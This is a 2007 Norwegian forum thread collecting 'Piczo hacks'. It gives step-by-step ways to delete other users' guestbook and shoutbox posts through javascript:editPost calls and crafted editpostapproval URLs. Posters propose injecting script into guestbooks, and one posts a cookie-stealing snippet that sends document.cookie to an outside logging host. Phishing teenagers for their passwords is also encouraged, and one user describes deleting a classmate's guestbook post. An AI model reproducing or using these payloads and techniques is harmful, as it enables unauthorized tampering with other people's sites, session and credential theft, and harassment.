Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  247 44761
PICZO HACKS

Jeg har søkt litt rundt på NFF, og sett at det er en del som er interssert i hacks for Piczo. Mange lurere på hvordan hacke piczo hvordan kommer forbi passordbeskytta sider, hvordan slette Guestbook innlegg o.l

Jeg foreslår at vi samler alt som er hacking av piczo relatert til et emne så vi slipper å ha flere 100 emner om dette.

Også prøv å hold dere til emne og ikke post flere like hacks ta heller å rediger gamle så vi slipper for mye rot.

Takk!

Slette gjestebok 5 Enkle steg + FILM

1. Gå til Gjesteboken høyreklikk et random sted på siden å velg "Vis Kilde"
2. Hold nede CTRL+B nå får du opp et søke vindu hvor du skriver noe av teksten fra innlegget/kommentaren fra gjesteboka du vil ha slettet.
3. Finn Comment IDen i teksten der det står: "postGbView62118212" tallene er det vi trenger, de varier fra kommentarene i gjesteboken så ingen er like
4. Det du nå gjør er å skrive: javascript:editPost(62118212) i URLen pass på at du unblocker Popupen for en liten stund så du får opp editboksen
5. Nå trykker du bare på DELETE i boksen og kommentaren er slettet fra gjesteboken

Det er en veldig bra film lagt ut på YouTube som forklarer dette på Engelsk

[COLOR=Red]LINK:[/COLOR] http://www.youtube.com/watch?v=yVseY...7E8CAE&index=5
er mer interesert i å få vite hvordan man kommer seg forbi passordbeskyttede bildegallerier

fikk det ikkje til, mulig eg bruka firefox på fiel måte. eller så er eg for full
Sist endret av Paniel; 7. april 2007 kl. 04:39.
isars's Avatar
Trådstarter
Jeg jobber for øyeblikket med å skaffe flere Piczo hacks. Blandt annet er det å kunne komme forbi passordbeskytta sider et stort ønske. jeg håper at de som da eventuelt kan andre Piczo hacks, er villig til å dele dem med oss andre.

Takk!
Ser bra ut. Utrolig at Piczo ikke har fikset dette Men en annen "Hack" må vel kunne sies å være social enginering aka Phising. At man utgir seg for å være piczo crew for lettlurte tenåringer og tar passordet glatt. Krever kreativitet, men jeg vedder på at det går på en del lettlurte tenåringer.
Sitat av Gisse
Ser bra ut. Utrolig at Piczo ikke har fikset dette Men en annen "Hack" må vel kunne sies å være social enginering aka Phising. At man utgir seg for å være piczo crew for lettlurte tenåringer og tar passordet glatt. Krever kreativitet, men jeg vedder på at det går på en del lettlurte tenåringer.
Vis hele sitatet...
jessda!
Det funker veldig fint

ellerså var det noe med gjesteboka på framsida man kunne gjøre også, slik at når man skreiv inn linken til sida kunne man bli redricta til et annet domene.
eller få en popup på sida når man kom innpå den, etc.
Husker ikke hvordan dette var, men mcmak som henger her veit det.
Satser på at han skriver det ned til oss.
Hvis gjesteboka ligger inni som en frame, eller hva det kalles Hvordan åpner jeg bare den frame'n?

edit:
fant det ut selv:P Søkte bare på frame til jeg fant riktig adresse til gjesteboka i kildekoda

edit igjen:
Fortsatt så funker ikke driten hos meg :P når jeg har skrivd javascript:editPost(nr på post) så skjer det ingen ting. Peiling på hva som kan være feil?
Får høyreklikket så det kommer opp en meny dings her men ikke inne på piczo sider, hva er galt?
Går det ann å redigere, i såfall kan de sjekke at det er min ip som har blitt brukt til å endre posten?
isars's Avatar
Trådstarter
PICZO & GOOGLE HACK

Jeg har browsa litt rundt på nette etter flere script hacks som kan brukes til hacking av piczo. Jeg så en film fra YouTube hvor noen hadde brukt et JavaScript for å kunne få Google logoen til å fly rundt på google siden. Dette var da et script som ble skrevet i URLen når du var inne på Google siden. Scriptet fungerer ikke bare på Google men også på Piczo, litt gøy å se alle bildene fly rundt på skjermen.

Nå kommer det som har med Piczo å gjøre, det er nemlig mulig å legge dette scriptet inn i noen gjestebøker også få hele gjesteboka til å fly rundt hver gang noen går inn i gjestebooka til den personen. altså en hack som blir på siden.

Til nå har jeg ikke klart å finne ut helt hvordan dette scriptet må plaseres, men jeg gir dere alle scriptet så dere kan leke dere med det.

Kode

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);
Det skal ligge en Film inne på YouTube som viser hvordan dette gjøres, jeg fant ikke den filmen jeg en gang så, så hvis noen finner en god veiledende film for dette, kan dere sende meg den på PM så skal jeg legge den ut her.

[COLOR=Red]VIKTIG:[/COLOR] Jeg håper du vil dele erfaringene du gjorde med scriptet, til oss andre!
Trigonoceps occipita
vidarlo's Avatar
Donor
Dersom du greier å plassere en snutt javascript i ei gjestebok, så kan jo det brukast til mykje meir enn det der. XSS for eksempel, slik at du kan sniffe dei passorda du har lyst på...
Fant en interresant video på youtube
How to Hack Piczo - XSS
isars's Avatar
Trådstarter
Sitat av BjornarR
Fant en interresant video på youtube
How to Hack Piczo - XSS
Vis hele sitatet...

[COLOR=Blue]1000 Takk[/COLOR] BjornarR
Jeg skal teste ut dette først også eventuelt lage en pen liten guide + FILM

TAKK!
Det hullet er vel tettet vil jeg tro.
Very Important Pyrotechnician
Thoryllo's Avatar
Sitat av isars
PICZO & GOOGLE HACK

Jeg har browsa litt rundt på nette etter flere script hacks som kan brukes til hacking av piczo. Jeg så en film fra YouTube hvor noen hadde brukt et JavaScript for å kunne få Google logoen til å fly rundt på google siden. Dette var da et script som ble skrevet i URLen når du var inne på Google siden. Scriptet fungerer ikke bare på Google men også på Piczo, litt gøy å se alle bildene fly rundt på skjermen.

Nå kommer det som har med Piczo å gjøre, det er nemlig mulig å legge dette scriptet inn i noen gjestebøker også få hele gjesteboka til å fly rundt hver gang noen går inn i gjestebooka til den personen. altså en hack som blir på siden.

Til nå har jeg ikke klart å finne ut helt hvordan dette scriptet må plaseres, men jeg gir dere alle scriptet så dere kan leke dere med det.

Kode

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);
Det skal ligge en Film inne på YouTube som viser hvordan dette gjøres, jeg fant ikke den filmen jeg en gang så, så hvis noen finner en god veiledende film for dette, kan dere sende meg den på PM så skal jeg legge den ut her.

[COLOR=Red]VIKTIG:[/COLOR] Jeg håper du vil dele erfaringene du gjorde med scriptet, til oss andre!
Vis hele sitatet...
Dette er gammel nytt. Jeg har sitter ofte å gjort dette på skolen, Funker fett på Google, amazon, og mange phpbb-forum. Har sikkert gjort det 7ganger på TG07 og:P
Du går inn på f.eks. www.google.com, når siden kommer opp, sletter du adresselinja og putter inn javascript-koden i adresselinja og trykker enter.
Ja dette er ikke en hack så lurer på hva den gjør her...
Sist endret av Thoryllo; 7. april 2007 kl. 14:38.
Sitat av Thoryllo
Dette er gammel nytt. Jeg har sitter ofte å gjort dette på skolen, Funker fett på Google, amazon, og mange phpbb-forum. Har sikkert gjort det 7ganger på TG07 og:P
Du går inn på f.eks. www.google.com, når siden kommer opp, sletter du adresselinja og putter inn javascript-koden i adresselinja og trykker enter.
Vis hele sitatet...
Njaa, vil ikke kalt det en hack. Det skjer jo bare på din maskin lokalt. =)
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av typisk
Njaa, vil ikke kalt det en hack. Det skjer jo bare på din maskin lokalt. =)
Vis hele sitatet...
Sant, men om du ser litt, så er det enkelte som seier at det går an å skrive javascript inn i gjestebøkene til folk, og da er det brått XSS, og en ganske neat hack også.

Det gøyale er jo at du kan stjele cookies og passord med javascript...
isars's Avatar
Trådstarter
Sitat av vidarlo
Det gøyale er jo at du kan stjele cookies og passord med javascript...
Vis hele sitatet...
Kan du fortelle oss som ikke har hørt eller prøvd det før, litt mer om det?
Kansje du har noen script du kan dele med oss?
Sitat av vidarlo
Sant, men om du ser litt, så er det enkelte som seier at det går an å skrive javascript inn i gjestebøkene til folk, og da er det brått XSS, og en ganske neat hack også.
Vis hele sitatet...
Akkurat det eksempelet Thoryllo kom med er jo bare en gøyal ting

--------

Putte den på en webside vil sende cookie til deg.

<script>
new Image().src="http://dittomraade.com/log.php?c="+encodeURI(document.cookie);
</script>

Nå må det nevnes at det finnes masse flere eksempler, bare google litt så finner du ut.
"Steal Cookies Javascript" , "XSS" etc..
Sist endret av esl; 7. april 2007 kl. 14:56.
Trigonoceps occipita
vidarlo's Avatar
Donor
Googler du litt etter Cross site cookie stealing så finner du garantert et par hundretusen eksempel om dette.
isars's Avatar
Trådstarter
Great Stuff! sikkert mange som fant dette nyttig!
Jeg får ikke "hacken" til å fungere jeg - trykker vis kilde men den boksen kommer ikke opp.. Noe med at jeg bruker Internett Explorer eller?
isars's Avatar
Trådstarter
Sitat av Coldfire
Jeg får ikke "hacken" til å fungere jeg - trykker vis kilde men den boksen kommer ikke opp.. Noe med at jeg bruker Internett Explorer eller?
Vis hele sitatet...
Jeg tror bare denne hacken fungerer på Gjesteboken så pass på at når du trykker vis kilde, at du er i en gjestebok og ikke en shoutbox eller comment book.
Sitat av Coldfire
Jeg får ikke "hacken" til å fungere jeg - trykker vis kilde men den boksen kommer ikke opp.. Noe med at jeg bruker Internett Explorer eller?
Vis hele sitatet...
Nei, funker ikke i IE... Har selv prøvd...
Last ned firefox www.getfirefox.com
isars's Avatar
Trådstarter
jeg tenkte at nå som vi har fått opp en god del hacks/Scripts, så er det nok en del av oss som kommer til å prøve dem ut. Og for at ikke andre skal bli irriterte over at vi skal teste ut på dems Piczo side så har jeg valgt å legge ut en liten Piczo side som dere kan teste dette ut på.

[COLOR=Red]www.NFF-HAX.piczo.com [/COLOR]
Sist endret av isars; 7. april 2007 kl. 15:50.
Sitat av RampLest
Nei, funker ikke i IE... Har selv prøvd...
Last ned firefox www.getfirefox.com
Vis hele sitatet...
Joda, i filmen på youtube blir jo dette gjort i IE + at jeg har gjort det selv.

Menneh, til trådstarter: Er det ingen ulemper med dette? Vil eieren av siden se noen IP som har vært i gjesteboken og slettet?
Sist endret av Christian; 7. april 2007 kl. 15:51.
Sitat av chouse
Joda, i filmen på youtube blir jo dette gjort i IE + at jeg har gjort det selv.

Menneh, til trådstarter: Er det ingen ulemper med dette? Vil eieren av siden se noen IP som har vært i gjesteboken og slettet?
Vis hele sitatet...
Nei, men postene i databasen blir ikke slettet, og der lagres også IP-adressen.. Så det er jo selvsagt en "risk" (er ikke helt sikker på om jeg kan kalle det en risk^^)

EDIT:
Til dere som vil absolutt slette innlegg, så hvorfor ikke skrive; javascript:deletePost('id') istedenfor edit? Da må man jo trykke flere ganger, og vil også dermed ta lengre tid å slette ett og ett innlegg

Til dere som kan programmering, hvorfor ikke lage en liten "bot" som sletter ALLE innleggene fort:P?
Sist endret av RampLest; 7. april 2007 kl. 15:55.
Hva skal de gjøre? Knipe deg for å slette noen innlegg? Nei, tipper du er uten fare. At de registrer ip'n *TROR* jeg heller de ikke gjør. Da hadde hullet vært tettet for lengst.
Sitat av Coldfire
Jeg får ikke "hacken" til å fungere jeg - trykker vis kilde men den boksen kommer ikke opp.. Noe med at jeg bruker Internett Explorer eller?
Vis hele sitatet...

Bruk opera eller firefox.



Å slette innlegg fra piczo sider er ganke gammelt nytt. Enkelt er det også. Men gøy er det
Sitat av typisk
Hva skal de gjøre? Knipe deg for å slette noen innlegg? Nei, tipper du er uten fare. At de registrer ip'n *TROR* jeg heller de ikke gjør. Da hadde hullet vært tettet for lengst.
Vis hele sitatet...
Sant så sant^^ Men tipper nok de ikke blir slettet i databasen for hvis du skriver det samme igjen, altså;
hvis du først skal slette ett innlegg: javascript:editPost(54472233) <-Det der
Deretter trykker du "Delete"<- POPUP -> "OK" Dermed så blir innlegget sletta, så skriver du det samme igjen:
javascript:editPost(54472233)
Så kommer samme teksten opp...
isars's Avatar
Trådstarter
Liten oppdatering til PICZO & GOOGLE HACKen om du skriver <script>"KODEN"</script> også javascript koden vil dette fungere fint på Piczo også

[COLOR=Green]Ferdig[/COLOR]

Kode

<script>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);</script>
[COLOR=Blue]Jeg håper en mod gidder å sette sammen denne oppdateringen til den orginale posten.[/COLOR]
[~::Shoutbox Hacking::~]

Now, shoutbox hacking is similar, although doesn't use javascript. You find the Post ID the same, or perhaps you need to highlight it and select view selected source for the mozilla people. When you have that, look at the URL bar. At the begining you should see like, pic1.blah blah blah or pic2.blah blah blah. That is the server. Now inject this into the url, as if the server was pic5 and the ID is 47641150.

http://pic5.piczo.com/go/editpostapp...plpid=47641150

You should come to a screen asking to approve, disaprove or delete the message. Check delete and hit ok.
isars's Avatar
Trådstarter
Sitat av Mcmak
[~::Shoutbox Hacking::~]

Now, shoutbox hacking is similar, although doesn't use javascript. You find the Post ID the same, or perhaps you need to highlight it and select view selected source for the mozilla people. When you have that, look at the URL bar. At the begining you should see like, pic1.blah blah blah or pic2.blah blah blah. That is the server. Now inject this into the url, as if the server was pic5 and the ID is 47641150.

http://pic5.piczo.com/go/editpostapp...plpid=47641150

You should come to a screen asking to approve, disaprove or delete the message. Check delete and hit ok.
Vis hele sitatet...
[COLOR=Red]Nice work Mcmak![/COLOR]

Til dere som vil prøve det på NFF-Hax.piczo.com så blir det

Kode

http://pic6.piczo.com/go/editpostapproval?plpid="Shoutbox IDen"
hey jeg har prøvd den hacke du la ut isars...men får det ikke til jeg...når jeg skriver javascript:editPost(54483222) så kommer det ikke opp noe...kanske jeg har forstått feil oxo=\
har du slått av pop-up blokken?
ja jeg slo av den nå...det skjer ikke noe trykka enter 100 ganger nå:P
sikker på at du har riktige tall i javascriptet
Sitat av general9999
hey jeg har prøvd den hacke du la ut isars...men får det ikke til jeg...når jeg skriver javascript:editPost(54483222) så kommer det ikke opp noe...kanske jeg har forstått feil oxo=\
Vis hele sitatet...

Da har du skrevet feil. javascript:editPost(id) er riktig. husk stor bokstav i ordet post. Ikke noe mellomrom.

Da skal det gå.

(du må ha java på pcen, men jeg går ut ifra at du har det)

Edit: bruk firefox eller opera.
Sist endret av 3RD; 7. april 2007 kl. 21:15.
isars's Avatar
Trådstarter
Sitat av general9999
hey jeg har prøvd den hacke du la ut isars...men får det ikke til jeg...når jeg skriver javascript:editPost(54483222) så kommer det ikke opp noe...kanske jeg har forstått feil oxo=\
Vis hele sitatet...
Pass på at det du skal slette er en post fra en Gjestebok og ikke en Shoutbox eller Comment board
Det er forskjellig ID dette er slik du vil finne IDen id="postGbView[COLOR=Red]54527650[/COLOR]"
Jeg bruker IE 7 og det fungere helt perfekt

Her er javascript koden om du vil ta Copy-Past

Kode

javascript:editPost("ID skal stå her")
Må bare få sagt noe, det er faktisk mulig at jeg har blitt tatt av piczo nå
Ok, testa dette på ei i klassen min sin side og fjernet en beskjed i gjesteboka.
Nå er hele siden til hun plutselig nede, så gikk jeg til en annen jente sin side og så på sånn venne greie, der var adressen til hun første jenta, og den virket!
Men det går fortsatt ikke å komme seg inn på den adressen man skal skrive "normalt" http://linktiladresse.piczo.com.
Bare http://pic5.piczo.com/go/friend?id=t...ppo=y&nsrc=ppf.
Det er en mulighet for at piczo bare har tatt ned siden for å sjekke akkurat dette tenkte jeg med en gang
Hva tror dere?
Er litt nervøs
isars's Avatar
Trådstarter
Sitat av BjornarR
Må bare få sagt noe, det er faktisk mulig at jeg har blitt tatt av piczo nå
Ok, testa dette på ei i klassen min sin side og fjernet en beskjed i gjesteboka.
Nå er hele siden til hun plutselig nede, så gikk jeg til en annen jente sin side og så på sånn venne greie, der var adressen til hun første jenta, og den virket!
Men det går fortsatt ikke å komme seg inn på den adressen man skal skrive "normalt" http://linktiladresse.piczo.com.
Bare http://pic5.piczo.com/go/friend?id=t...ppo=y&nsrc=ppf.
Det er en mulighet for at piczo bare har tatt ned siden for å sjekke akkurat dette tenkte jeg med en gang
Hva tror dere?
Er litt nervøs
Vis hele sitatet...
Jeg tror ikke du trenger være redd for at Piczo har busta dag, da hadde du ikke fått til gang til noen Piczo sider, tror heller det er henne selv eller Piczo som har lagt ned siden eller bare en midlertidlig server error skjer stadig vekk at man får sånn siden kan ikke vises!
isars's Avatar
Trådstarter
Sitat av general9999
"postGbView50297210" den id fant jeg...oxo gjør jeg sånn som du sier javascript:editPost(50297210) og skriver oppe på søke siden,skjer ikke en dritt=\ men altså jeg er ikke så flink med pc:P men skulle vert morro og fått til det da
Vis hele sitatet...
1. Gå inn i gjesteboken
2. Gå til addresse linja å skriv javascript:editPost(50297210)
3. Pass på at ikke popup blokeringen er på
4. Du kan se om blokeringen er på nede på statuslinja
5. Etter du har fjernet popup blokeringen må du bare oppdatere siden med javascriptet
6. Nå burde det fungere ellers vet jeg ikke hva som er feil.
haha nå fikk jeg firefox vet ikke åsen den skal åpnes:P

joda takk for hjelpen nå gikk det;D haha God påske foresten
Sitat av isars
[COLOR=Red]Nice work Mcmak![/COLOR]

Til dere som vil prøve det på NFF-Hax.piczo.com så blir det

Kode

http://pic6.piczo.com/go/editpostapproval?plpid="Shoutbox IDen"
Vis hele sitatet...
mulig du kan forklare dette litt nærmere?. klarer ikke helt å få det til!
isars's Avatar
Trådstarter
Sitat av zeptic
mulig du kan forklare dette litt nærmere?. klarer ikke helt å få det til!
Vis hele sitatet...
Hum, det ser ikke ut til at den fungerte like vell?! flere som har prøvd denne?

Fint om det er noen som kansje gadd forklare den om igjen! ellers var det bra jobba av Mcmak
I see you...
NAPse's Avatar
Har problemet med den jeg og, jeg får opp sånn greie om jeg vil slette, skjule for andre enn piczoeier eller la det være synlig.
Så klikka jeg på slett --> ok men så kommer bare akkuratt det samme igjen.
Sist endret av NAPse; 7. april 2007 kl. 23:24.
Haha. Funka og slette fra gjesteboka, ikke redigere. men det var fett for det
Fett om noen kunne finne ut hvordan man hacket seg gjennom piczosider som har password
Sitat av Habbitz
Fett om noen kunne finne ut hvordan man hacket seg gjennom piczosider som har password
Vis hele sitatet...
Social engineering.
Noe annet er ikke vits å drømme om engang.
isars's Avatar
Trådstarter
Jeg har hørt og lest mye om Cookies logging som et javascript, som slik jeg har forstått det kan logg føre password og brukere. Jeg vet ikke så mye om dette men jeg fant tre Film på YouTube om noe av dette. Handler om XSS, så hvis noen av dere som skjønner dere på dette, kansje ville forklare oss andre litt.

[COLOR=Red]LINK

FILM 1: http://www.youtube.com/watch?v=QsCbPrcpOe0 (XSS by chislam)

FILM 2: http://www.youtube.com/watch?v=0Sf5l-l8xpU (XSS by zerooverride)

FILM 3: http://www.youtube.com/watch?v=Zy8Hdqht0ps (XSS 2 by zerooverride):[/COLOR]
Sitat av general9999
jupp...men har det noe å si om det er gjestebok box?
Vis hele sitatet...

Det fungerer kun på gjesteboken, IKKE på shutout boxen hvis det var det du tenkte på.
Sitat av isars
Hum, det ser ikke ut til at den fungerte like vell?! flere som har prøvd denne?

Fint om det er noen som kansje gadd forklare den om igjen! ellers var det bra jobba av Mcmak
Vis hele sitatet...
Det første du gjør er å høyreklikke og Vis Kilde (CTRL+U i FireFox).
Så søker du (CTRL+F) etter pic, helt til du finner "picX.piczo.com" (MERK: x = et tall)

Det jeg fant var følgende;

Kode

http://pic2.piczo.com/go/addimagestocart?img=
Det varierer hvilke servere piczo sidene ligger på. Dvs. det kan være;
pic1.piczo.com
pic2.piczo.com
pic3.piczo.com
osv.

Piczoen jeg fant ligger på piczo2.
Det du gjør da er å endre det som er markert med fet skrift her, til den piczo serveren din

Kode

http://pic6.piczo.com/go/editpostapproval?plpid=shoutboxid
Altså, da blir det slik for meg

Kode

http://pic2.piczo.com/go/editpostapproval?plpid=shoutboxid

For å finne id'ene gjør du følgende;
Høyreklikk i Shoutboxen og trykk "Merk Alt".
Høyreklikk og trykk "Vis kildekode for valgt tekst".
Trykk CTRL+F og søk etter; postView

Da skal det komme opp

Kode

postView12345678
postView87654321
osv.
Det du trenger er tallene markert i bold.
Skriv inn koden sånn at det blir seendes slik ut;

Kode

http://pic2.piczo.com/go/editpostapproval?plpid=12345678

Håper dette hjalp litt. Vet det ble litt rotete, men jeg gjorde mitt beste

God Påske
Sist endret av pression; 8. april 2007 kl. 01:46.